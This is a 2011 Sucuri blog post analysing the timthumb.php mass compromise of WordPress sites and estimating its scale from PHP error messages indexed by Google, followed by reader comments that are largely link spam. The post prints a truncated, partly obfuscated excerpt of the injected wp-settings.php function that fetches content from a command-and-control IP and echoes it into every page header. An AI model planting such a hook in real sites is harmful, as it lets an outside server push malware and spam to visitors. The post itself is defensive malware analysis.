• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Timthumb.php Mass Infection – Aftermath – Part I

October 28, 2011David Dede

FacebookTwitterSubscribe

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to gain metrics based on the amount of sites that were truly affected, the problem is that it’s very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.

This is done through this function:

function counter_wordpress()
{$_F=__FILE__;$_X=’Pz48P3BocCAkM3JsID..fWD0wOw==’));
$ua = urlencode(strtol.. $ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action("wp_head", ‘counter_wordpress’);

If you are familiar with PHP/WordPress, you’ll notice that this is adding the output of this function (counter_wordpress, which calls 91.196.216.30/bt.php) to the header of the compromised site.

Everything is OK, but what happens when the site 91.196.216.30 goes down? If the site has display_errors enabled on PHP, this will show up:

 Warning: file_get_contents(http://91.196.216.30/bt.php?ip=IP&host=..

Basically if that IP address goes down, you’re able to identify the compromised sites by looking for this error. Fortunately, that IP address went down various times during the last few weeks and if we search on Google for that error (‘”Warning: file_get_contents(http://91.196.216.30/bt.php”‘), this is what we get:

Yes, about 1 million pages had this error when Google crawled it. If you reduce the Google search for just the last 30 days, it will show around 200k pages.

Now, if you consider that not all sites have display_errors enabled, and that many of them were not crawled by Google when the malware domain was down, we can see that the number of compromised sites is still very large. We would guess in the couple of million.

That’s a whole slew of sites affected by one 3rd party script in which a vulnerability was found and subsequently exploited. What do you guys think? We’d love more ideas if you have any.

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. DeepIndex

    November 15, 2011

    One of my websites has been hacked with this timthumb vulnerability, it’s a pity to clean all the files…I’m on it since last friday :-/

  2. Burton Taylor

    November 17, 2011

    It is great article with valuable information. Thanks for sharing the
    article.

  3. Andrei

    November 18, 2011

    Thanx for instruction

  4. JAdeer

    December 2, 2011

    My Blog also Shows this. what should i do to remove that???
     
    jdrnandi@gmail.com Mail me

    • 2013 dekorasyon

      March 7, 2012

       To remove it download a new one I think. 2012 dekorasyon,ev dekorasyon,dekorasyon

  5. limerick2

    December 10, 2011

    Good Mantel point out there! 

    • 7i57i75

      March 2, 2012

       tbhehber

  6. Fábio

    December 14, 2011

    Huge nunmber of infects… But how to fix this definetly?

    • 7i57i75

      March 2, 2012

       fffffffffffffffff

    • dekorasyon

      March 7, 2012

       What is the problem

  7. Kelly

    December 19, 2011

    I think this is my problem. Can you your service help me?

  8. Panghaidar

    February 16, 2012

    my Worpdress blog got hacked too ../sigh

  9. ev dekorasyon

    March 7, 2012

     I have it in the cache and delete the cache file is also available

  10. teras dekorasyonu

    March 9, 2012

    2012 dekorasyon
    ev dekorasyon
    dekorasyon

    pratik bilgiler
    2012 pratik bilgiler
    pratik
    2013 pratik bilgiler
     

  11. Uwodzenie

    May 1, 2012

    My site was owned by this script 🙁

  12. Dekorasyon

    May 5, 2012

    Yes, about 1 million pages had this error when Google crawled it. If you
    reduce the Google search for just the last 30 days, it will show around
    200k pages.
    http://www.akinyapi.net

  13. mobilya dekorasyon

    June 12, 2012

    i cant remove it please help

    http://www.mobilyala.com

  14. Matthew Lampard

    August 20, 2012

    I think it’s already a thing of the past, pretty much network support.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.